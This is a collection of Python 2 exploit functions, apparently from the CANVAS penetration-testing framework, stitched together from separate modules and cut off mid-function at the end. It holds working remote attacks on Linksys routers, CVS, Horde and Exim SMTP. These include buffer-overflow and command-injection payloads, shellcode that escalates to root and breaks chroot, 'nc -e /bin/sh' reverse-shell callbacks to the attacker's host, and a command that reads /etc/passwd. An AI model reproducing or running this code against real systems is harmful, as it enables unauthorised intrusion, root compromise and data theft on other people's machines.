def dorun(self): linksysapplycgiExploit.__init__(self, self.host, self.port) self.sock = self.attack() if not self.sock: self.log("exploitation failed") return 0 self.setInfo("%s %s:%d successfully exploited!" % (NAME, self.host, self.port)) self.t = Telnet() self.t.sock = self.sock self.log("restarting httpd...") self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n") if self.cmdline: self.proxy() return try: shell = shelllistener(shellfromtelnet(self.t), logfunction=self.logfunction, simpleShell=1) except: self.log( "Could not make a shell listener - connection was closed. Exploit most likely failed." ) self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell return node
def exploitIT(self, func_pointer, shellcode_addr, offset): self.exploiting = 1 extra = "Max-dotdot\n" extra += "Case\n" extra += "Set p=d\n" extra += "UseUnchanged\n" extra += "Global_option -n\n" extra += "Gssapi-encrypt\n" extra += "Update-prog x\n" before="A" * offset + self.shellcode + \ "A" * (0x8000-offset-len(self.shellcode))+"\n" for a in range(0, self.repeat, 4): #if self.ISucceeded(): # return 1 if self.getState() == self.HALT: self.raiseError("Exploit halted by user") if not allowAddress(func_pointer + a, [0x0a, 0x0]): continue try: self.debuglog( "Trying exploit with func_pointer: 0x%08x with shellcode: 0x%08x" % (func_pointer + a, shellcode_addr)) try: tmp = self.Write4(func_pointer + a, shellcode_addr, before=before, after=extra, timeout=1, debug=0) except: continue try: #if self.ISucceeded(): # self.target.add_knowledge("CVS addresses", ( func_pointer+a,shellcode_addr, offset), 100) # return 1 ## tmp is response, check last char received check = tmp[len(tmp) - 1:] if check.find("G") >= 0: ##print "Success ! (halted)" ##sys.stdin.read(1) print "GOT IT! UNIX Shell Mode .." telnetshell = Telnet() telnetshell.sock = self.exploitsock return telnetshell except: self.exploitsock.close() pass except timeoutsocket.Timeout: pass except cvserror: pass time.sleep(0.4) self.raiseError("Exploit failed")
def convertToCanvas(self, sock): self.log('Starting UnixShellNode') tn = Telnet() tn.sock = sock node = unixShellNode.unixShellNode() node.parentnode = self.argsDict['passednodes'][0] node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1) return node
def startup(self): """ Startup a /bin/sh """ from libs.ctelnetlib import Telnet if self.started: return self.log("Startup...") try: #for timeoutsocket self.connection.set_timeout(None) except: self.log("Not using timeoutsocket on this node") sc = shellcodeGenerator.bsd_X86() sc.addAttr("sendreg",{"fdreg":"ebx","regtosend":"ebx"}) sc.addAttr("read_and_exec",{"fdreg":"ebx"}) getfd = sc.get() self.sendrequest(getfd) #now read in our little endian word that is our fd (originally in ebx) self.fd = self.readword() self.log("Self.fd --> %d"%self.fd) sc = shellcodeGenerator.bsd_X86() if self.initstring.count("whileone"): sc.addAttr("whileone", None) sc.addAttr("Normalize Stack",[500]) sc.addAttr("setuid",[0]) sc.addAttr("setreuid",[0,0]) sc.addAttr("setuid",[0]) if self.initstring.count("chrootbreak"): self.log("Doing a chrootbreak") sc.addAttr("chrootbreak",None) sc.addAttr("dup2",[self.fd]) sc.addAttr("setuid",None) #myshellcode.addAttr("debugme",None) sc.addAttr("execve",{"argv": ["/bin/sh","-i"],"envp": [],"filename": "/bin/sh"}) self.log("Sent execve...") mainloop = sc.get() self.sendrequest(mainloop) telnetshell = Telnet() telnetshell.sock=self.connection print "Setting up shell listener." shelllistener.__init__(self,telnetshell,logfunction=self.logfunction) print "Set up shell listener" #ok, now our mainloop code is running over on the other side self.log("Set up BSD shell server") #self.sendrequest(mainloop) self.started = 1 return 1
def ncCallbackShell(self): shellback = "nc -n " + self.callback.ip + " " + str( self.data_port) + " -e /bin/sh" payload = self.cmdExec.replace("TARGETATTRIBUTE", self.targetattribute) payload = payload.replace("THECMD", urlencode(shellback)) lsock = self.gettcplistener(self.data_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to list on port %d" % self.data_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.data_port) self.log("WP> Sending Exploit") result = spkproxy.urlopen(self.url + payload, extraheaders=self.headers, data="", exploit=self) self.log("WP> Awaiting connectback") lsock.set_timeout(30) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
def run(self): self.getArgs() #thread off to listen for the post listenDaemon = threading.Thread(target=self.listen3010) listenDaemon.setDaemon(True) listenDaemon.start() time.sleep(2) #thread off to make the post sendPost = threading.Thread(target=self.makePost) sendPost.start() #self.makePost() time.sleep(3) #wait for the request to hit the listener self.host = self.target.interface self.port = 1337 self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) logging.info("Attacking %s:%d (in progress)" % (self.host, self.port)) try: s = self.gettcpsock() s.connect((self.host, self.port)) except socket.error: logging.info("Backdoor connection not successful") self.setProgress(-1) return 0 telnetshell = Telnet() telnetshell.sock = s self.setProgress(80) try: # Success, convert to unixShellNode through shellfromtelnet. shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction) except: logging.info( "Could not make a shell listener - connection was closed. Exploit most likely failed" ) import traceback print '-' * 60 logging.traceback(file=sys.stdout) print '-' * 60 self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("%s attacking %s:%d (success!)" % (NAME, self.host, self.port)) return node
def run(self): self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) try: s = self.gettcpsock() s.connect((self.host, self.port)) except socket.error: self.log("backdoor connection not successful.") self.setProgress(-1) return 0 telnetshell = Telnet() telnetshell.sock = s self.setProgress(80) try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction) except: self.log( "Could not make a shell listener - connection was closed. Exploit most likely failed." ) import traceback print '-' * 60 traceback.print_exc(file=sys.stdout) print '-' * 60 self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] #shell=shelllistener(shellfromtelnet(tn)) node.shell = shell self.setInfo("%s attacking %s:%d (success!)" % (NAME, self.host, self.port)) return node
def run(self): """ Actually exploit the target. """ self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port)) #first make socket connection to target self.log("Connecting to %s:%d" % (self.host, self.port)) #self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s = self.gettcpsock() try: self.s.connect((self.host, int(self.port))) except: self.log("Could not connect!") self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return 0 self.IAC_neg() self.do_exploit() # need to add error checking telnetshell = Telnet() telnetshell.sock = self.s try: shell = shelllistener(shellfromtelnet(telnetshell)) node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell except: self.log("Connection closed during exploit - server is patched.") self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return None self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) #shell should always be valid here.... return node
def brute(self, desc, brute_range, brute_off): self.log('### Computer Hacking: %s (off: %.8x)' % (desc, brute_off)) self.log('### Trying map range: %.8x-%.8x' % (brute_range[0], brute_range[1])) system_ptr = self.find_system_ptr(brute_range[0], brute_range[1], brute_off) # base, top, off if not system_ptr: return None, False fd, s = self.find_client_fd(system_ptr) if fd == -1: self.log('### Could not find client fd ... target /bin/sh linked to POSIX-strict shell like Dash?') self.log('### Treating failure as false positive ... (this is probably what you want)') return system_ptr + 0x1000 - brute_off, False self.log('### Stage 2 success ... we can execute commands interactively :D') self.log('### Escalating to CANVAS shell, this may take a while ...') # there's a bit of a tradeoff by going to /bin/bash ... we lose 2 fd width chars, but fd's > 100 are # unlikely to occur on non-busy targets ... by going through bash we ensure that our double re-direct # works as expected ... we also have the advantage of it scrubbing our effective uid of nobody so # our root privs work as expected ... so the width tradeoff is worth it IMO try: # we _SHOULD_ have a shell waiting on s for us at this point ... tn = Telnet() tn.sock = s #tn.sock.send('id|sed s/i/1/g|sed s/o/0/g;HISTFILE=/dev/null bash -i\n') #return tn,True # XXX: if you prefer a regular telnet shell on the cmdline, use this # CANVAS specific node = unixShellNode.unixShellNode() node.parentnode = self.argsDict['passednodes'][0] node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1) return node, True except Exception: import traceback traceback.print_exc(file=sys.stdout) self.log('### Skipping false positive!') return system_ptr + 0x1000 - brute_off, False
def run(self): self.getArgs() payload = self.makesploit() if self.execCMD: self.log('WP> Running command: %s' % (self.execCMD)) s = self.gettcpsock() s.connect((self.host, self.port)) s.settimeout(7) self.log("WP> Sending Exploit") try: s.recv(128) s.sendall("HELP ACIDBITCHEZ\n") except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 time.sleep(1) s.sendall(payload) reply = s.recv(4096) if "502 Unknown command" in reply: self.log("WP> Exploit failed - target not vulnerable!") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Response:\n%s" % reply) time.sleep(3) s.close() self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) self.log("WP> Command executed successfully") return 1 else: lsock = self.gettcplistener(self.rcv_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to list on port %d" % self.rcv_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.rcv_port) s = self.gettcpsock() s.connect((self.host, self.port)) self.log("WP> Sending Exploit") try: s.recv(128) s.sendall("HELP ACIDBITCHEZ\n") except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 time.sleep(1) try: s.sendall(payload) reply = s.recv(4096) if "502 Unknown command" in reply: self.log("WP> Exploit failed - target not vulnerable!") self.setInfo( "WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 except: print "" self.log("WP> Awaiting connectback") lsock.set_timeout(30) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
def handleConnection(self, connection): try: connection.set_timeout(None) except: self.log("[!] likely an ipv6 socket, set_timeout not supported !") server = None if self.type == self.targets.index("LINUXEXECVE_INTEL"): self.log("Connected: Running a Linux server...") import linuxMosdefShellServer #time.sleep(10) newshell = unixShellNode() pnode = localNode() pnode.newNode(newshell) server = linuxMosdefShellServer.execveshellserver( connection, newshell) #server.addInitString(self.initstring) #server.addInitString("chrootbreak") server.startup() elif self.type == self.targets.index("LINUXMOSDEF_INTEL"): self.log("Connected, Linux MOSDEF ...") newshell = linuxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('Linux', 'i386')(connection, newshell) #shell=linuxMosdefShellServer.linuxshellserver(connection,newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index('OSXMOSDEF_INTEL'): self.log('Connected, OSX MOSDEF INTEL ...') newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = MosdefShellServer('OSX', 'i386')(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("OSXMOSDEF_PPC"): self.log("Connected, OSX MOSDEF PPC ...") import osxMosdefShellServer newshell = osxNode() pnode = localNode() pnode.newNode(newshell) shell = osxMosdefShellServer.osxshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("WIN32MOSDEF_INTEL"): self.log("Connected, running win32 MOSDEF server") import win32MosdefShellServer from win32Node import win32Node newshell = win32Node() pnode = localNode() pnode.newNode(newshell) shell = win32MosdefShellServer.win32shellserver(connection, newshell, logfunction=None) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"): self.log("Connected, Solaris MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisshellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"): self.log("Connected, Solaris x86 MOSDEF ...") import solarisMosdefShellServer newshell = solarisNode() pnode = localNode() pnode.newNode(newshell) shell = solarisMosdefShellServer.solarisx86shellserver( connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("BSDMOSDEF_INTEL"): self.log("Connected, BSD MOSDEF") import bsdMosdefShellserver newshell = bsdNode() pnode = localNode() pnode.newNode(newshell) shell = bsdMosdefShellserver.bsdshellserver(connection, newshell) shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_51_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.1') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("AIXMOSDEF_52_PPC"): self.log("Connected, AIX MOSDEF") newshell = aixNode() pnode = localNode() pnode.newNode(newshell) aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC') shell = aixMosdefShellServer(connection, newshell, version='5.2') shell.argsDict = self.argsDict newshell.startup() server = shell elif self.type == self.targets.index("PHPMULTI"): newsocket = connection self.log("Starting up a %s server" % type) import phplistener from ScriptShellServer import phpshellserver node = ScriptNode() node.parentnode = self.engine.getLocalNode() shell = phpshellserver(newsocket, node) shell.startup() newshell = node server = shell elif self.type == self.targets.index("UNIXSHELL"): newsocket = connection self.log("Starting up Unix Shell") pnode = localNode() telnetshell = Telnet() telnetshell.sock = newsocket shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.log) newshell = unixShellNode() newshell.shell = shell shell.node = newshell pnode.newNode(newshell) server = shell elif self.type == self.targets.index("JAVA"): newsocket = connection self.log("Starting up a %s server" % type) from Nodes.JavaShellServer import javashellserver from JavaNode import JavaNode node = JavaNode() node.parentnode = self.engine.getLocalNode() shell = javashellserver(newsocket, node) shell.startup() newshell = node server = shell else: print "Don't know what type I am!" sys.exit(1) if self.mode == "interactive": print "Letting user interact with server" if server: server.interact() else: print "No server...exiting this shell..." elif self.mode == "Run one command": print "Running a command or set of commands" if self.uploadfiles != []: for f in self.uploadfiles: print "Uploading %s" % f # Why doesn't this use exploits/upload/upload.py then? print server.upload(f) print server.runcommand(self.command) ###insert your post-op stuff here!!! ###you might want: ###server.doexitthread(1) ###or server.runexitprocess() if server: server.disconnect() return
def startup(self): """ this function is called by the engine and by self.run() we are ready to rock! Our stage one shellcode just reads in a word, then reads in that much data and executes it First we send some shellcode to get the socket registered Then we send some shellcode to execve """ if self.started: return from libs.ctelnetlib import Telnet self.log("Startup...") try: #for timeoutsocket self.connection.set_timeout(None) except: self.log("Not using timeoutsocket on this node") sc = shellcodeGenerator.linux_X86() sc.addAttr("sendreg", {"fdreg": "ebx", "regtosend": "ebx"}) sc.addAttr("read_and_exec", {"fdreg": "ebx"}) getfd = sc.get() self.sendrequest(getfd) #now read in our little endian word that is our fd (originally in ebx) self.fd = self.readword() self.log("Self.fd=%d" % self.fd) sc = shellcodeGenerator.linux_X86() if self.initstring.count("whileone"): sc.addAttr("whileone", None) sc.addAttr("Normalize Stack", [500]) sc.addAttr("setuid", [0]) sc.addAttr("setreuid", [0, 0]) sc.addAttr("setuid", [0]) if self.initstring.count("chrootbreak"): self.log("Doing a chrootbreak") sc.addAttr("chrootbreak", None) sc.addAttr("dup2", [self.fd]) sc.addAttr("setuid", None) #myshellcode.addAttr("debugme",None) sc.addAttr("execve", { "argv": ["/bin/sh", "-i"], "envp": [], "filename": "/bin/sh" }) self.log("Sent execve...") mainloop = sc.get() #print sc.getcode() self.sendrequest(mainloop) #now it should be running /bin/sh -i telnetshell = Telnet() telnetshell.sock = self.connection print "Setting up shell listener." shelllistener.__init__(self, telnetshell, logfunction=self.logfunction) print "Set up shell listener" #ok, now our mainloop code is running over on the other side self.log("Set up Linux shell server") #self.sendrequest(mainloop) self.started = 1 return 1
except timeoutsocket.Timeout: if self.debugged == True: self.log("[!] recv timed out ..") return 2 except Exception, msg: # on trigger we have an exception msg == 'GO' if msg: self.log("== %s ==" % msg) if 'GO' in msg: if self.execve == True: # telnet interact with execve shell from libs.ctelnetlib import Telnet telnetshell = Telnet() telnetshell.sock = ftp.sock telnetshell.sock.send( '/sbin/ifconfig -a;cat /etc/passwd;uname -a\n') return telnetshell else: # MOSDEF .. payload reads blindly 255 bytes and then goes into MOSDEF # because our MOSDEF code mmaps from /dev/zero we HAVE to break chroot from MOSDEFShellServer import MosdefShellServer from linuxNode import linuxNode node = linuxNode() node.parentnode = self.argsDict["passednodes"][0] shellServer = MosdefShellServer('Linux', 'i386')
def run(self): self.getArgs() useragentstring = "http://" + self.host + ":%s" % self.port + "/" UA = spkproxy.UserAgent(useragentstring, auth=None, hostname=self.host, exploit=self) ret = 0 if self.command: self.log("WP> Executing Command: %s" % self.command) self.log("WP> Sending Exploit") UA.SetCookie("href", "system:" + self.command) data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=False) lhref = 'link.href = \'#' for i in range(len(data)): if lhref in data[i:i + len(lhref)]: if not '\';' in data[i + len(lhref):i + len(lhref) + 2]: result = data[i + len(lhref):data. find('\n\';', (i + len(lhref)))] ret = 1 self.log("WP> Command Result:\n%s\r\n " % prettyprint(result)) time.sleep(2) if ret: self.setInfo("WP> %s attacking %s:%d - completed (success!)" % (NAME, self.host, self.port)) else: self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return ret else: lsock = self.gettcplistener(self.rcv_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to list on port %d" % self.rcv_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.rcv_port) self.log("WP> Sending Exploit") # nc -n ip port -e /bin/sh \&\n UA.SetCookie( "href", "system:nc -n " + self.callback.ip + " " + str(self.rcv_port) + "%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e") data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=True) self.log("WP> Awaiting connectback") lsock.set_timeout(30) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
def run(self): self.getArgs() self.host = self.target.interface self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port)) try: s = smtplib.SMTP(self.host, self.port, timeout=10) except: self.log("Could not connect to smtp") return False s.sock.set_timeout(20) try: if self.ehlo_name == "": s.ehlo() else: s.ehlo(self.ehlo_name) except: self.log("EHLO failed") return False # Parse out the client hostname and ip address from the EHLO response self.log("EHLO reply: %s" % s.ehlo_resp) response = re.split(" |\t|\r\n|\n", s.ehlo_resp) self.target_name = response[0] self.client_name, self.client_ip = response[2:4] if self.ehlo_name == "": self.ehlo_name = s.local_hostname # Eliminate the encapsulating [] from the target ip address self.client_ip = self.client_ip[1:-1] self.log("Parsing EHLO response.") self.log("Target name = " + self.target_name) self.log("Client name = " + self.client_name) self.log("Client IP = " + self.client_ip) # Send MAIL FROM using client name. if self.mail_from == "": self.mail_from = "canvas@%s" % self.client_name try: n, r = s.docmd("MAIL FROM: %s" % self.mail_from) except: self.log("SMTP server disconnected") return False if n != 250: self.log("MAIL FROM command failed: %d %s" % (n, r)) return False # Send RCPT TO using target name. if self.rcpt_to == "": self.rcpt_to = "postmaster@%s" % self.target_name try: n, r = s.docmd("RCPT TO: <%s>" % self.rcpt_to) except: self.log("SMTP server disconnected") return False if n != 250: self.log("RCPT TO command failed: %d %s" % (n, r)) return False # Send DATA command. try: n, r = s.docmd("DATA") except: self.log("SMTP server disconnected") return False if n != 354: self.log("DATA command failed: %d %s" % (n, r)) return False # Proceed to send out the headers log_space = self.get_log_buffer_space() self.log("Log buffer space: %u" % log_space) # Fill the log buffer by sending headers. We reserve three bytes # for the "%c " used for the next header, and the terminating 0 # reserved in string_format() itself. self.log("Filling log buffer with %u bytes" % (log_space - 3)) try: filled = self.fill_log_buffer(s.sock, log_space - 3) except: self.log("Filling log failed") return False self.log("Sent %u header bytes to accomplish this" % filled) # Send over the attack string self.log("Sending attack string") try: self.send_evil_header(s.sock) except: self.log("Sending evil header failed") return False # And finally send 50MiB of crap to go over the message size. self.log("Sending larger message than allowed...") try: self.mailbomb(s.sock) except: self.log("Sending mailbomb failed") return False self.log("Done!") # Send '.' command to terminate the mail. We expect this to # result in a 552 error. try: n, r = s.docmd(".") except: self.log("SMTP server disconnected") return False if n != 552: self.log("Sending message did not trigger 552: %d %s" % (n, r)) return False # Trigger the ACL which string_expands() our evil header. self.log("Trying to trigger bug") try: s.sock.send("MAIL FROM: <*****@*****.**>\r\n") except: self.log("Sending trigger failed") return False # See what the remote answered. This should drain either the # SMTP return code, or the shell command line. self.log("Verifying trigger") try: s.sock.recv(4096) except: self.log("Error reading trigger response. Daemon crashed?") return False # Verify if things worked. We send a string with backslashes in # there, as the shell will eat them, while an MTA will not. try: s.sock.send("/bin/echo har\\har\\har\\har\r\n") except: self.log("Sending of verifier failed") # See what the remote answered. try: response = s.sock.recv(4096) except: self.log("Error reading trigger response. Daemon crashed?") return False # harharharhar is not guaranteed to be seen in the response (for instance ubuntu 9.x with exim 4.6x) # (maybe) better way to judge success is to try and execute a command and check reply # if response.find("harharharhar") == -1 and response.find("access tty") == -1 and response.find("$") == -1: # self.log("Exploit failed. Did not spawn a shell.") # self.log("Response was: " + response) # return False # self.log("Success! Trigger response: " + response) # Success, convert to unixShellNode through shellfromtelnet. try: node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] tnshell = Telnet() tnshell.sock = s.sock shell = shelllistener(shellfromtelnet(tnshell)) ret = shell.runcommand('/bin/uname -a') if not ret: raise Exception('No reason') self.log('Runcommand output: %s' % ret) except: self.log('Exploit failed. Did not spawn a shell: %s' % response) return False self.log('Success! Trigger response: ' + response) node.shell = shell shell.node = node self.setInfo("%s attacking %s:%d (succeeded!)" % (NAME, self.host, self.port)) return node
def run(self): self.getArgs() payload = self.makesploit() if self.execCMD: self.log('WP> Running command: %s' % (self.execCMD)) try: s = self.gettcpsock() s.connect((self.host, self.port)) self.log("WP> Sending Exploit") s.recv(128) s.sendall(payload) except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 time.sleep(5) s.close() self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) self.log( "WP> Command executed successfully (if reply required try TCP Connectback)" ) return 1 else: lsock = self.gettcplistener(self.rcv_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to list on port %d" % self.rcv_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.rcv_port) try: s = self.gettcpsock() s.connect((self.host, self.port)) self.log("WP> Sending Exploit") s.recv(128) s.sendall(payload) except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 time.sleep(3) s.close() self.log("WP> Awaiting connectback") lsock.set_timeout(30) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
def run(self): self.getArgs() lsock = self.gettcplistener(self.rcv_port, self.callback.ip) if lsock == 0: self.log("WP> Unable to listen on port %d" % self.rcv_port) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Listening on port %d" % self.rcv_port) s = self.gettcpsock() s.connect((self.host, self.port)) s.setblocking(0) s.settimeout(600) self.log("WP> Sending Exploit: Stage 1") try: s.recv(128) except: self.log("WP> Attack reported no open socket - service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 s.sendall("EHLO %s\r\n" % self.ehlo_host) reply = s.recv(128) if not str(self.maxMsgSz) in reply: reply = reply.splitlines() for i in range(len(reply)): if '250-SIZE' in reply[i]: reply = reply[i].split('250-SIZE ') self.maxMsgSz = reply[1] break try: s.sendall("MAIL FROM: %s\r\n" % self.from_addr) reply = s.recv(128) if not '250' in reply: self.log("WP> Target denied mail from: %s - invalid address?" % self.from_addr) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 s.sendall("RCPT TO: %s\r\n" % self.to_addr) reply = s.recv(128) if not '250' in reply: self.log("WP> Target denied mail to: %s - invalid address?" % self.to_addr) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 s.sendall("DATA\r\n") s.recv(128) except: self.log("WP> Target no longer responding - Service died?") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 msgSz = (self.maxMsgSz + 262144) log_size = 8189 log = \ "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <%s> H=(%s) [%s]: message too big: read=%s max=%s\n" \ "Envelope-from: <%s>\nEnvelope-to: <%s>\n" \ % (self.from_addr, self.ehlo_host, self.callback.ip, str(msgSz), str(self.maxMsgSz), self.from_addr, self.to_addr) hs = [] while len(log) < log_size: h_name = wp_randomstring(10) padding = wp_randomstring(128) h = "%s: %s\n" % (h_name, padding) m1 = (2 + len(h)) m2 = 2 * m1 remaining = log_size - len(log) if remaining < m2 and remaining > m1: remaining -= 4 p1 = remaining / 2 h = h[0:(p1 - 1)] + "\n" hs += h log += " " + str(hs) p2 = remaining - p1 h_name = wp_randomstring(10) padding = wp_randomstring(128) h = "%s: %s\n" % (h_name, padding) h = h[0:(p2 - 1)] + "\n" hs += h log += " " + h packet1 = "".join(hs) h_name = wp_randomstring(7).upper() packet2 = h_name + ": " for i in range(51): for k in range(3, 13): packet2 += "${run{/bin/sh -c 'exec /bin/sh -i <&%s >&0 2>&0'}} " % k packet2 += "\n" payload = "" while (len(payload) < msgSz): payload += (wp_randomstring(254) + "\r\n") * 16384 s.sendall(packet1) s.sendall(packet2) s.sendall(payload) s.sendall("\r\n.\r\n") reply = s.recv(128) if not '552 Message size exceeds maximum permitted' in reply: self.log( "WP> Target appears not to be vulnerable - exploit failed.") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 s.send("MAIL FROM: %s\r\n" % self.from_addr) reply = s.recv(128) if not 'sh-' in reply: self.log( "WP> Target appears not to be vulnerable - exploit failed.") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 self.log("WP> Sending Exploit: Stage 2") s.sendall( "echo \'spool_directory = ${run{/bin/nc -n %s %s -e /bin/sh &}}\' > /var/spool/exim4/%s\n" % (self.callback.ip, self.rcv_port, self.backdoor)) s.sendall( "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin exim -C/var/spool/exim4/%s -q;rm -rf /var/spool/exim4/%s\n" % (self.backdoor, self.backdoor)) self.log("WP> Awaiting connectback") lsock.set_timeout(60) try: (s2, addr) = lsock.accept() s2.set_timeout(2) except: self.log("WP> Connectback failed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 telnetshell = Telnet() 